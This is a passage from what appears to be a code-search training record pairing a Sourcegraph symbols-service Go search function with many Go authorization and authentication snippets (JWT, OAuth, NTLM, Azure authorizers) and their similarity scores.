fmt.Errorf(\"failed to get multitenant SPT from certificate auth: %v\", err)\n\t}\n\treturn autorest.NewMultiTenantServicePrincipalTokenAuthorizer(mtSPT), nil\n}", "func authorize(name string) error {\n\tif distro.Get() == distro.Synology {\n\t\treturn authorizeSynology(name)\n\t}\n\treturn nil\n}", "func (a *Policy) Authorize(r *http.Request) string {\n\t// There are multiple message exchanges in this protocal. Since\n\t// we don't have a structure to maintain the session, we need to\n\t// reverse engineer the state.\n\n\t// Do we have a NLTM token? If not, the client has not provided the\n\t// necessary credientials.\n\ttoken := r.Header.Get(\"Authorization\")\n\tif !strings.HasPrefix(token, \"NTLM \") {\n\t\treturn \"\"\n\t}\n\t// Decode the NTLM token. Verify that it has the correct signature,\n\t// and that it is the correct type\n\tdata, err := base64.StdEncoding.DecodeString(token[5:])\n\tif err != nil {\n\t\ta.LogAuthenticationFailure(err.Error())\n\t\treturn \"\"\n\t}\n\tif !checkNTLMMessageSignature(data) {\n\t\ta.LogAuthenticationFailure(\"malformed NTLM message, incorrect signature\")\n\t\treturn \"\"\n\t}\n\tif msgType := getNTLMMessageType(data); msgType == 0x1000000 {\n\t\t// Client is responding to initial message. We can't proceed\n\t\t// until the client responds with the type 3 message.\n\t\treturn \"\"\n\t} else if msgType != 0x3000000 {\n\t\t// Client ought to response with either a type1 or type3 message. We\n\t\t// just checked for a type 1, so if it isn't a type 3, the client has\n\t\t// made an error.\n\t\ta.LogAuthenticationFailure(\"malformed NTLM message, unexpected type\")\n\t\treturn \"\"\n\t}\n\n\t// Take the raw bytes, and extract the message\n\terr = a.context.Update(data)\n\tif err != nil {\n\t\ta.LogAuthenticationFailure(err.Error())\n\t\treturn \"\"\n\t}\n\n\tvar msg type3Message\n\terr = msg.Decode(data)\n\tif err != nil {\n\t\ta.LogAuthenticationFailure(err.Error())\n\t\treturn \"\"\n\t}\n\n\treturn ConvertString(msg.Flags, msg.UserName)\n}", "func Authorize(w http.ResponseWriter, r *http.Request) {\n\n\tauthRequest := &models.AuthorizeRequestBody{}\n\tif !authRequest.Validate(w, r) {\n\t\treturn\n\t}\n\tauthcode := authRequest.GenerateAuthCode(w)\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\n\tresponse := map[string]interface{}{\"data\": map[string]interface{}{\n\t\t\"authorization_code\": authcode.Code,\n\t\t\"expires_at\": authcode.ExpiresAt,\n\t}, \"status\": 1}\n\tjson.NewEncoder(w).Encode(response)\n}", "func (a *userNameAuthentication) Type() AuthenticationType {\n\treturn a.authType\n}", "func (ups UsernamePasswordConfig) Authorizer() (autorest.Authorizer, error) {\n\tspToken, err := ups.ServicePrincipalToken()\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from username and password auth: %v\", err)\n\t}\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func Authorization(ctx context.Context) (string, error) {\n\treturn fromMeta(ctx, AuthKey)\n}", "func (c *APIGateway) TestInvokeAuthorizerRequest(input *TestInvokeAuthorizerInput) (req *request.Request, output *TestInvokeAuthorizerOutput) {\n\top := &request.Operation{\n\t\tName: opTestInvokeAuthorizer,\n\t\tHTTPMethod: \"POST\",\n\t\tHTTPPath: \"/restapis/{restapi_id}/authorizers/{authorizer_id}\",\n\t}\n\n\tif input == nil {\n\t\tinput = &TestInvokeAuthorizerInput{}\n\t}\n\n\treq = c.newRequest(op, input, output)\n\toutput = &TestInvokeAuthorizerOutput{}\n\treq.Data = output\n\treturn\n}", "func (c Colorizer) Type() string {\n\treturn \"Colorizer\"\n}", "func NewAuthorizer(ctx *pulumi.Context,\n\tname string, args *AuthorizerArgs, opts ...pulumi.ResourceOpt) (*Authorizer, error) {\n\tif args == nil || args.RestApi == nil {\n\t\treturn nil, errors.New(\"missing required argument 'RestApi'\")\n\t}\n\tinputs := make(map[string]interface{})\n\tif args == nil {\n\t\tinputs[\"authorizerCredentials\"] = nil\n\t\tinputs[\"authorizerResultTtlInSeconds\"] = nil\n\t\tinputs[\"authorizerUri\"] = nil\n\t\tinputs[\"identitySource\"] = nil\n\t\tinputs[\"identityValidationExpression\"] = nil\n\t\tinputs[\"name\"] = nil\n\t\tinputs[\"providerArns\"] = nil\n\t\tinputs[\"restApi\"] = nil\n\t\tinputs[\"type\"] = nil\n\t} else {\n\t\tinputs[\"authorizerCredentials\"] = args.AuthorizerCredentials\n\t\tinputs[\"authorizerResultTtlInSeconds\"] = args.AuthorizerResultTtlInSeconds\n\t\tinputs[\"authorizerUri\"] = args.AuthorizerUri\n\t\tinputs[\"identitySource\"] = args.IdentitySource\n\t\tinputs[\"identityValidationExpression\"] = args.IdentityValidationExpression\n\t\tinputs[\"name\"] = args.Name\n\t\tinputs[\"providerArns\"] = args.ProviderArns\n\t\tinputs[\"restApi\"] = args.RestApi\n\t\tinputs[\"type\"] = args.Type\n\t}\n\ts, err := ctx.RegisterResource(\"aws:apigateway/authorizer:Authorizer\", name, true, inputs, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &Authorizer{s: s}, nil\n}", "func NewAuthorizer(introspector TokenIntrospecter, cfg *Config) *Authorizer {\n\treturn &Authorizer{introspection: introspector, config: cfg}\n}", "func AuthorizeJWT(jwt *interfaces.JWTAuth) gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\ttokenString := jwt.ExtractToken(c.Request)\n\t\tfetched := jwt.FetchToken(tokenString, c.Request) // fetched indica se achou no banco\n\t\t// err := jwt.TokenValid(c.Request)\n\t\tif !fetched {\n\t\t\tc.JSON(http.StatusUnauthorized, \"Voce nao possui autorizacao para acessar essa rota\")\n\t\t\tc.Abort()\n\t\t\treturn\n\t\t}\n\t\tc.Next()\n\t}\n}", "func IsAuthorized(request *http.Request) bool {\n\tauthHeaderValue, exist := request.Header[\"Authorization\"]\n\n\tif !exist && len(authHeaderValue) != 1 {\n\t\treturn false\n\t}\n\n\tsplitBearer := strings.Split(authHeaderValue[0], \"Bearer \")\n\n\tif len(splitBearer) != 2 {\n\t\treturn false\n\t}\n\n\tvar token string = splitBearer[1]\n\n\tvar queryResult string\n\terr := database.Con.QueryRow(\"select token from users where token = ?\", token).Scan(&queryResult)\n\n\tif err == sql.ErrNoRows {\n\t\treturn false\n\t}\n\n\tif err != nil {\n\t\tlog.Fatal(err.Error())\n\t}\n\n\treturn true\n}", "func (s *mockSession) Authorize(provider goth.Provider, params goth.Params) (string, error) {\n\ttok := params.Get(key.Role)\n\trequire.Equal(s.t, s.Role, tok)\n\treturn s.Session.Authorize(provider, params)\n}", "func (r *Request) Bearer() string {\n\ts := r.Authorization()\n\tl := strings.Split(s, \" \")\n\tif len(l) != 2 {\n\t\treturn \"\"\n\t}\n\tif l[0] == \"Bearer\" {\n\t\treturn l[1]\n\t}\n\treturn \"\"\n}", "func authorizator(data interface{}, c *gin.Context) bool {\n\tif _, ok := data.(*models.User); ok {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (g *gitlabConsumer) AuthorizeToken(ctx context.Context, state, code string) (string, string, error) {\n\tlog.Debug(ctx, \"GitlabDriver.AuthorizeToken: state:%s code:%s\", state, code)\n\n\tparams := url.Values{}\n\tparams.Add(\"client_id\", g.appID)\n\tparams.Add(\"client_secret\", g.secret)\n\tparams.Add(\"code\", code)\n\tparams.Add(\"grant_type\", \"authorization_code\")\n\tparams.Add(\"redirect_uri\", g.AuthorizationCallbackURL)\n\n\theaders := map[string][]string{}\n\theaders[\"Accept\"] = []string{\"application/json\"}\n\n\tstatus, res, err := g.postForm(\"/oauth/token\", params, headers)\n\tif err != nil {\n\t\treturn \"\", \"\", err\n\t}\n\n\tif status < 200 && status >= 400 {\n\t\treturn \"\", \"\", fmt.Errorf(\"Gitlab error (%d) %s \", status, string(res))\n\t}\n\n\tglResponse := authorizeResponse{}\n\tif err := sdk.JSONUnmarshal(res, &glResponse); err != nil {\n\t\treturn \"\", \"\", fmt.Errorf(\"Unable to parse gitlab response (%d) %s \", status, string(res))\n\t}\n\n\treturn glResponse.AccessToken, state, nil\n}", "func (provider *GoogleOAuthProvider) Authorize(code string, redirect_uri string) error {\n\trequest, err := grequests.Post(\"https://www.googleapis.com/oauth2/v4/token\", &grequests.RequestOptions{\n\t\tParams: map[string]string{\n\t\t\t\"client_id\": config.GOOGLE_CLIENT_ID,\n\t\t\t\"client_secret\": config.GOOGLE_CLIENT_SECRET,\n\t\t\t\"code\": code,\n\t\t\t\"redirect_uri\": redirect_uri,\n\t\t\t\"grant_type\": \"authorization_code\",\n\t\t},\n\t\tHeaders: map[string]string{\n\t\t\t\"Accept\": \"application/json\",\n\t\t},\n\t})\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tresponse_status := fmt.Sprintf(\"%s\", request.String())\n\n\tvar oauth_token models.GoogleOauthToken\n\terr = request.JSON(&oauth_token)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif oauth_token.Token == \"\" {\n\t\treturn errors.New(\"Invalid oauth code. Response: \" + response_status)\n\t}\n\n\tprovider.token = oauth_token.Token\n\n\treturn nil\n}", "func IsAuthorized(handler http.HandlerFunc) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tif r.Header[\"Token\"] == nil {\n\t\t\tvar err Error\n\t\t\terr = SetError(err, \"No Token Found\")\n\t\t\tjson.NewEncoder(w).Encode(err)\n\t\t\treturn\n\t\t}\n\t\tvar mySigninKey = []byte(secretkey)\n\n\t\ttoken, err := jwt.Parse(r.Header[\"Token\"][0], func(token *jwt.Token) (interface{}, error) {\n\t\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\t\treturn nil, fmt.Errorf(\"There was an error in parsing\")\n\t\t\t}\n\t\t\treturn mySigninKey, nil\n\t\t})\n\n\t\tif err != nil {\n\t\t\tvar err Error\n\t\t\terr = SetError(err, \"Your Token has been expired\")\n\t\t\tjson.NewEncoder(w).Encode(err)\n\t\t\treturn\n\t\t}\n\n\t\tif claims, ok := token.Claims.(jwt.MapClaims); ok && token.Valid {\n\t\t\tif claims[\"role\"] == \"admin\" {\n\t\t\t\tr.Header.Set(\"Role\", \"admin\")\n\t\t\t\thandler.ServeHTTP(w, r)\n\t\t\t\treturn\n\t\t\t} else if claims[\"role\"] == \"user\" {\n\t\t\t\tr.Header.Set(\"Role\", \"user\")\n\t\t\t\thandler.ServeHTTP(w, r)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tvar reserr Error\n\t\treserr = SetError(reserr, \"Not Authrorized\")\n\t\tjson.NewEncoder(w).Encode(err)\n\t}\n}", "func (o ApiOperationRequestHeaderOutput) TypeName() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v ApiOperationRequestHeader) *string { return v.TypeName }).(pulumi.StringPtrOutput)\n}", "func (o ApiOperationRequestHeaderOutput) Type() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ApiOperationRequestHeader) string { return v.Type }).(pulumi.StringOutput)\n}", "func (c *authorizer) Name() string {\n\treturn c.config.Name\n}", "func (s *StashConsumer) AuthorizeToken(strToken, verifier string) (string, string, error) {\n\taccessTokenURL, _ := url.Parse(s.consumer.AccessTokenURL)\n\treq := http.Request{\n\t\tURL: accessTokenURL,\n\t\tMethod: \"POST\",\n\t\tProtoMajor: 1,\n\t\tProtoMinor: 1,\n\t\tClose: true,\n\t}\n\tt := oauth1.NewAccessToken(strToken, \"\", map[string]string{})\n\terr := s.consumer.SignParams(&req, t, map[string]string{\"oauth_verifier\": verifier})\n\tif err != nil {\n\t\treturn \"\", \"\", err\n\t}\n\tresp, err := http.DefaultClient.Do(&req)\n\tif err != nil {\n\t\treturn \"\", \"\", err\n\t}\n\n\taccessToken, err := oauth1.ParseAccessToken(resp.Body)\n\tif err != nil {\n\t\treturn \"\", \"\", err\n\t}\n\treturn accessToken.Token(), accessToken.Secret(), nil\n}", "func (settings EnvironmentSettings) GetAuthorizer() (autorest.Authorizer, error) {\n\t//1.Client Credentials\n\tif c, e := settings.GetClientCredentials(); e == nil {\n\t\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetAuthorizer() using client secret credentials\")\n\t\treturn c.Authorizer()\n\t}\n\n\t//2. Client Certificate\n\tif c, e := settings.GetClientCertificate(); e == nil {\n\t\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetAuthorizer() using client certificate credentials\")\n\t\treturn c.Authorizer()\n\t}\n\n\t//3. Username Password\n\tif c, e := settings.GetUsernamePassword(); e == nil {\n\t\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetAuthorizer() using user name/password credentials\")\n\t\treturn c.Authorizer()\n\t}\n\n\t// 4. MSI\n\tif !adal.MSIAvailable(context.Background(), nil) {\n\t\treturn nil, errors.New(\"MSI not available\")\n\t}\n\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetAuthorizer() using MSI authentication\")\n\treturn settings.GetMSI().Authorizer()\n}", "func (ccc ClientCertificateConfig) Authorizer() (autorest.Authorizer, error) {\n\toauthConfig, err := adal.NewOAuthConfig(ccc.AADEndpoint, ccc.TenantID)\n\n\tcertData, err := ioutil.ReadFile(ccc.CertificatePath)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to read the certificate file (%s): %v\", ccc.CertificatePath, err)\n\t}\n\n\tcertificate, rsaPrivateKey, err := decodePkcs12(certData, ccc.CertificatePassword)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to decode pkcs12 certificate while creating spt: %v\", err)\n\t}\n\n\tspToken, err := adal.NewServicePrincipalTokenFromCertificate(*oauthConfig, ccc.ClientID, certificate, rsaPrivateKey, ccc.Resource)\n\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from certificate auth: %v\", err)\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func (*UserAuth) TypeName() string {\n\treturn \"user.auth\"\n}", "func (a Authorizers) Authorize(r *http.Request, config *EndpointConfig) (err error) {\n\tcheck := []string{}\n\tfor _, an := range config.Authorizers {\n\t\tcheck = append(check, an)\n\t}\n\tfor _, an := range config.Methods[r.Method].Authorizers {\n\t\tcheck = append(check, an)\n\t}\n\n\tfor _, an := range check {\n\t\tauthorizer := a[an]\n\t\tif err = authorizer.Authorize(r); err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\treturn\n}", "func (c *Client) Authorize(payload *TokenRequestPayload) (string, error) {\n\tresp, err := c.RequestAuthorization(payload)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tvar (\n\t\tstatus string\n\t\ttrackId = resp.Result.TrackID\n\t\tappToken = resp.Result.AppToken\n\t)\n\tfor {\n\t\tresp, err := c.TrackAuthorizationProgress(trackId)\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tstatus = resp.Result.Status\n\t\tif status != \"pending\" {\n\t\t\tbreak\n\t\t}\n\n\t\ttime.Sleep(2 * time.Second)\n\t}\n\n\tif status != \"granted\" {\n\t\treturn \"\", fmt.Errorf(\"invalid authorization status: %s\", status)\n\t}\n\n\tc.SetApp(payload.AppID, appToken, payload.AppVersion)\n\n\treturn appToken, nil\n}", "func Authorize(w http.ResponseWriter, r *http.Request, next http.HandlerFunc) {\n\n\t// Get token from request\n\ttoken, err := request.ParseFromRequestWithClaims(r, request.OAuth2Extractor, &AppClaims{}, func(token *jwt.Token) (interface{}, error) {\n\t\t// since we only use the one private key to sign the tokens,\n\t\t// we also only use its public counter part to verify\n\t\treturn verifyKey, nil\n\t})\n\n\tif err != nil {\n\t\tswitch err.(type) {\n\n\t\tcase *jwt.ValidationError: // JWT validation error\n\t\t\tvErr := err.(*jwt.ValidationError)\n\n\t\t\tswitch vErr.Errors {\n\t\t\tcase jwt.ValidationErrorExpired: //JWT expired\n\t\t\t\tutils.DisplayAppError(\n\t\t\t\t\tw,\n\t\t\t\t\terr,\n\t\t\t\t\t\"Access Token is expired, get a new Token\",\n\t\t\t\t\t401,\n\t\t\t\t)\n\t\t\t\treturn\n\n\t\t\tdefault:\n\t\t\t\tutils.DisplayAppError(w,\n\t\t\t\t\terr,\n\t\t\t\t\t\"Error while parsing the Access Token!\",\n\t\t\t\t\t500,\n\t\t\t\t)\n\t\t\t\treturn\n\t\t\t}\n\n\t\tdefault:\n\t\t\tutils.DisplayAppError(w,\n\t\t\t\terr,\n\t\t\t\t\"Error while parsing Access Token!\",\n\t\t\t\t500)\n\t\t\treturn\n\t\t}\n\n\t}\n\tif token.Valid {\n\t\t// Using context: https://joeshaw.org/revisiting-context-and-http-handler-for-go-17/\n\t\tcontextWithUserEmail := context.WithValue(r.Context(), ContextUserEmailKey, token.Claims.(*AppClaims).CurrentUserEmail)\n\t\tnext.ServeHTTP(w, r.WithContext(contextWithUserEmail))\n\t} else {\n\t\tutils.DisplayAppError(\n\t\t\tw,\n\t\t\terr,\n\t\t\t\"Invalid Access Token\",\n\t\t\t401,\n\t\t)\n\t}\n}", "func AuthorizeToken(token string) *AuthorizeTokenAttemptResponse {\n\tlookup := ReverseLookupItem(token)\n\tif !lookup.Exists {\n\t\treturn &AuthorizeTokenAttemptResponse{\"\", \"\", false}\n\t}\n\treturn &AuthorizeTokenAttemptResponse{token, lookup.ReverseLookup.ReverseValue, true}\n\n}", "func NewAuthorizer(e *casbin.Enforcer) beego.FilterFunc {\n\treturn func(ctx *context.Context) {\n\t\ta := &BasicAuthorizer{enforcer: e}\n\n\t\tif !a.CheckPermission(ctx) {\n\t\t\ta.RequirePermission(ctx)\n\t\t}\n\t}\n}", "func (s *StsTokenCredential) GetType() string {\n\treturn \"sts\"\n}", "func (m *MockManagedClusterScope) Authorizer() autorest.Authorizer {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Authorizer\")\n\tret0, _ := ret[0].(autorest.Authorizer)\n\treturn ret0\n}", "func Authorized(ctx context.Context, authHeader string, verifier *oidc.IDTokenVerifier, policies ...Policy) (*oidc.IDToken, error) {\n\t// Validate token\n\ttoken, err := VerifyAuthToken(ctx, authHeader, verifier)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Validate policies\n\tfor _, policy := range policies {\n\t\tif valid := policy(token); !valid {\n\t\t\treturn nil, errors.New(\"unauthorized\")\n\t\t}\n\t}\n\n\treturn token, nil\n}", "func (ups UsernamePasswordConfig) Authorizer() (autorest.Authorizer, error) {\n\n\toauthConfig, err := adal.NewOAuthConfig(ups.AADEndpoint, ups.TenantID)\n\n\tspToken, err := adal.NewServicePrincipalTokenFromUsernamePassword(*oauthConfig, ups.ClientID, ups.Username, ups.Password, ups.Resource)\n\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from username and password auth: %v\", err)\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func NewAuthorizerFromEnvironment() (autorest.Authorizer, error) {\n\tlogger.Instance.Writeln(logger.LogInfo, \"NewAuthorizerFromEnvironment() determining authentication mechanism\")\n\tsettings, err := GetSettingsFromEnvironment()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn settings.GetAuthorizer()\n}", "func (*AccountChangeAuthorizationSettingsRequest) TypeID() uint32 {\n\treturn AccountChangeAuthorizationSettingsRequestTypeID\n}", "func (h *HttpAuthorizer) Authorize(r *http.Request) (err error) {\n\n\t// prepare data for template interpolation\n\tdata := map[string]interface{}{\n\t\t\"username\": \"phonkee\",\n\t\t\"password\": \"password\",\n\t}\n\n\tvar (\n\t\turl, method, body string\n\t)\n\n\turl, err = h.config.RenderURL(data)\n\tmethod, err = h.config.RenderMethod(data)\n\tbody, err = h.config.RenderData(data)\n\n\tvar (\n\t\tresponse *http.Response\n\t)\n\n\t// use Requester\n\tif _, response, err = NewRequester().DoNew(method, url, strings.NewReader(body)); err != nil {\n\t\treturn err\n\t}\n\n\tif response.StatusCode != http.StatusOK {\n\t\treturn ErrUnauthorized\n\t}\n\n\treturn\n}", "func (*MessagesAcceptUrlAuthRequest) TypeID() uint32 {\n\treturn MessagesAcceptUrlAuthRequestTypeID\n}", "func (r GetPublicKeyRequest) Type() RequestType {\n\treturn GetPublicKey\n}" ]
[ "0.61980224", "0.6126441", "0.61207795", "0.59648436", "0.5938632", "0.58868974", "0.5796655", "0.5790644", "0.5787622", "0.57243574", "0.5690847", "0.56687355", "0.5521617", "0.54964364", "0.5460831", "0.5450241", "0.5394661", "0.53943145", "0.53929675", "0.53923756", "0.5384448", "0.5369704", "0.5356844", "0.53060585", "0.5272916", "0.5260748", "0.52417463", "0.5228992", "0.5225701", "0.52148354", "0.519523", "0.51913863", "0.51727486", "0.5168363", "0.511954", "0.5119106", "0.5115696", "0.50918573", "0.5087752", "0.5083243", "0.5069382", "0.50669503", "0.50643486", "0.5049238", "0.50333196", "0.5029339", "0.5010827", "0.5008271", "0.5008227", "0.5001294", "0.49969986", "0.49943125", "0.49919465", "0.49653196", "0.49637482", "0.49637482", "0.49508265", "0.49424747", "0.49381912", "0.49361783", "0.49270052", "0.49262372", "0.49258652", "0.49257684", "0.4923127", "0.49191174", "0.4911965", "0.49064708", "0.49024686", "0.49006644", "0.48893732", "0.48891264", "0.48859403", "0.48854673", "0.48805937", "0.48736373", "0.4863205", "0.48603958", "0.48586532", "0.48485237", "0.48333535", "0.4828362", "0.48214313", "0.48207042", "0.4818874", "0.48163116", "0.4811276", "0.48097846", "0.48028144", "0.47956705", "0.47927466", "0.47876406", "0.47850436", "0.47818428", "0.47816187", "0.4766464", "0.4763371", "0.47514644", "0.47445527", "0.47392246" ]
0.56096715
12
Search performs a symbol search on the symbols service.
func (c *Client) Search(ctx context.Context, args search.SymbolsParameters) (symbols result.Symbols, err error) { span, ctx := ot.StartSpanFromContext(ctx, "symbols.Client.Search") defer func() { if err != nil { ext.Error.Set(span, true) span.LogFields(otlog.Error(err)) } span.Finish() }() span.SetTag("Repo", string(args.Repo)) span.SetTag("CommitID", string(args.CommitID)) resp, err := c.httpPost(ctx, "search", args.Repo, args) if err != nil { return nil, err } defer resp.Body.Close() if resp.StatusCode != http.StatusOK { // best-effort inclusion of body in error message body, _ := io.ReadAll(io.LimitReader(resp.Body, 200)) return nil, errors.Errorf( "Symbol.Search http status %d: %s", resp.StatusCode, string(body), ) } var response search.SymbolsResponse err = json.NewDecoder(resp.Body).Decode(&response) if err != nil { return nil, err } if response.Err != "" { return nil, errors.New(response.Err) } symbols = response.Symbols // 🚨 SECURITY: We have valid results, so we need to apply sub-repo permissions // filtering. if c.SubRepoPermsChecker == nil { return symbols, err } checker := c.SubRepoPermsChecker() if !authz.SubRepoEnabled(checker) { return symbols, err } a := actor.FromContext(ctx) // Filter in place filtered := symbols[:0] for _, r := range symbols { rc := authz.RepoContent{ Repo: args.Repo, Path: r.Path, } perm, err := authz.ActorPermissions(ctx, checker, a, rc) if err != nil { return nil, errors.Wrap(err, "checking sub-repo permissions") } if perm.Include(authz.Read) { filtered = append(filtered, r) } } return filtered, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (s *svc) Search(ctx context.Context, req *api.SearchRequest) (*api.SearchResponse, error) {\n\tvar resp api.SearchResponse\n\tresp.Results = &api.Series{\n\t\tKey: req.Key,\n\t}\n\n\telts, err := s.searcher.Search(req.Key, req.Oldest, req.Newest)\n\tswitch err.(type) {\n\tcase storage.KeyNotFound:\n\t\tresp.Status = api.SearchResponse_NOT_FOUND\n\t\treturn &resp, nil\n\tcase storage.InvalidSearch:\n\t\tresp.Status = api.SearchResponse_INVALID_ARGUMENTS\n\t\treturn &resp, nil\n\tcase nil:\n\tdefault:\n\t\treturn nil, err\n\t}\n\tfor _, elt := range elts {\n\t\tresp.Results.Elements = append(resp.Results.Elements, &elt)\n\t}\n\n\treturn &resp, nil\n}", "func (_TestABI *TestABISession) Search(ct Struct0) (*types.Transaction, error) {\n\treturn _TestABI.Contract.Search(&_TestABI.TransactOpts, ct)\n}", "func (c *grpcClient) Search(ctx context.Context, req *spb.SearchRequest) (*spb.SearchReply, error) {\n\treturn c.SearchServiceClient.Search(ctx, req)\n}", "func Search(pkg string, flags *types.Flags) error {\n\tfmt.Println(\"search is not working yet...\")\n\treturn nil\n}", "func (w *webClient) Search(ctx context.Context, q *spb.SearchRequest) (*spb.SearchReply, error) {\n\tvar reply spb.SearchReply\n\treturn &reply, web.Call(w.addr, \"search\", q, &reply)\n}", "func (s *Service) Search(term string, authConfig *AuthConfig, headers map[string][]string) (*SearchResults, error) {\n\trepoInfo, err := s.ResolveRepository(term)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t// *TODO: Search multiple indexes.\n\tendpoint, err := repoInfo.GetEndpoint()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tr, err := NewSession(authConfig, HTTPRequestFactory(headers), endpoint, true)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn r.SearchRepositories(repoInfo.GetSearchTerm())\n}", "func Search(query string) ([]Place, error) {\n\treturn DefaultClient.Search(query)\n}", "func (h *Handlers) Search(w http.ResponseWriter, r *http.Request) {\n\tinput, err := buildSearchInput(r.URL.Query())\n\tif err != nil {\n\t\th.logger.Error().Err(err).Str(\"query\", r.URL.RawQuery).Str(\"method\", \"Search\").Msg(\"invalid query\")\n\t\thttp.Error(w, err.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\tdataJSON, err := h.pkgManager.SearchJSON(r.Context(), input)\n\tif err != nil {\n\t\th.logger.Error().Err(err).Str(\"query\", r.URL.RawQuery).Str(\"method\", \"Search\").Send()\n\t\tif errors.Is(err, pkg.ErrInvalidInput) {\n\t\t\thttp.Error(w, err.Error(), http.StatusBadRequest)\n\t\t} else {\n\t\t\thttp.Error(w, \"\", http.StatusInternalServerError)\n\t\t}\n\t\treturn\n\t}\n\thelpers.RenderJSON(w, dataJSON, helpers.DefaultAPICacheMaxAge)\n}", "func (self *SearchService) Search(params *SearchRequest) (*Search, *http.Response, error) {\n\tsearch := new(Search)\n\tapiError := new(APIError)\n\n\tresp, err := self.api.New().QueryStruct(params).Receive(search, apiError)\n\treturn search, resp, relevantError(err, *apiError)\n}", "func (_TestABI *TestABITransactorSession) Search(ct Struct0) (*types.Transaction, error) {\n\treturn _TestABI.Contract.Search(&_TestABI.TransactOpts, ct)\n}", "func (c *Client) Search(ctx context.Context, params *SearchInput, optFns ...func(*Options)) (*SearchOutput, error) {\n\tif params == nil {\n\t\tparams = &SearchInput{}\n\t}\n\n\tresult, metadata, err := c.invokeOperation(ctx, \"Search\", params, optFns, c.addOperationSearchMiddlewares)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tout := result.(*SearchOutput)\n\tout.ResultMetadata = metadata\n\treturn out, nil\n}", "func (as *API) Search(ctx context.Context, req *pbreq.Search) (*pbresp.Results, error) {\n\tobjects, err := as.lens.KeywordSearch(req.Keywords)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar objs = make([]*pbresp.Object, len(objects))\n\tfor _, v := range objects {\n\t\tobjs = append(objs, &pbresp.Object{\n\t\t\tName: v.Name,\n\t\t\tMimeType: v.MetaData.MimeType,\n\t\t\tCategory: v.MetaData.Category,\n\t\t})\n\t}\n\n\treturn &pbresp.Results{\n\t\tObjects: objs,\n\t}, nil\n}", "func Search(param string) {\n\tfmt.Printf(\"Searching: %v...\\n\", param)\n\tpayload := domain.HttpRequestParam{\n\t\tMethod: \"GET\",\n\t\tURL: domain.BaseRoute + fmt.Sprintf(\"/REST/rxcui.json?name=%s&search=1\", url.QueryEscape(param)),\n\t\tHeaders: map[string]string{\n\t\t\t\"Authorization\": \"Bearer \",\n\t\t},\n\t}\n\n\tresp, err := MakeHttpRequest(payload)\n\tif err != nil {\n\t\tfmt.Printf(\"error: %v\\n\", err.Error())\n\t}\n\tdata := make(map[string]interface{})\n\n\terr = json.Unmarshal(resp, &data)\n\tif err != nil {\n\t\tfmt.Printf(\"error: %v\\n\", err.Error())\n\t}\n\n\t//pretty print data\n\tm, err := json.MarshalIndent(data, \"\", \" \")\n\tif err != nil {\n\t\tfmt.Printf(\"error: %v\\n\", err.Error())\n\t}\n\tfmt.Printf(\"%v\\n\", string(m))\n}", "func Search(cmd *cobra.Command, args []string) {\n\t//*TODO* Update with the new serializer option\n\tlog.Debug(\"Search subcommand run with log level: \", Verbose, \"\\n\")\n\n\tif len(args) > 0 {\n\t\tif args[0] != \"\" {\n\t\t\tsearchTerm = args[0]\n\t\t}\n\t}\n\tif len(args) > 1 {\n\t\tif args[1] != \"\" {\n\t\t\tgobFile = args[1]\n\t\t}\n\t}\n\n\tnp := persister.NewPersistor(persister.GOB)\n\terr := np.Load(gobFile, &data)\n\tif err != nil {\n\t\tlog.Errorf(\"error loading gob file: %v\", err)\n\t}\n\n\tfilters, urls, names := data.F, data.U, data.N\n\n\tvar found []interface{}\n\t// iterate through the filters and return indices of matches\n\tfor i, v := range filters {\n\t\tfilter, _ := cuckoo.Decode(v)\n\t\tif filter.Lookup([]byte(searchTerm)) {\n\t\t\tif len(found) >= rslts {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tfound = append(found, Result{\n\t\t\t\tName: names[i],\n\t\t\t\tURL: urls[i],\n\t\t\t})\n\t\t}\n\t}\n\n\tif !nostd {\n\t\t// ** PRETTY OUTPUT FOR USE AT COMMAND LINE **\n\t\tfoundJSON, err := json.MarshalIndent(found, \"\", \" \")\n\t\tif err != nil {\n\t\t\tlog.Errorf(\"error in marshalling the found results: %v\", err)\n\t\t}\n\t\tfmt.Printf(\"Search Results:\\n %s\\n\", string(foundJSON))\n\t}\n\n}", "func (s *Service) Search(c context.Context, mid, zoneid int64, 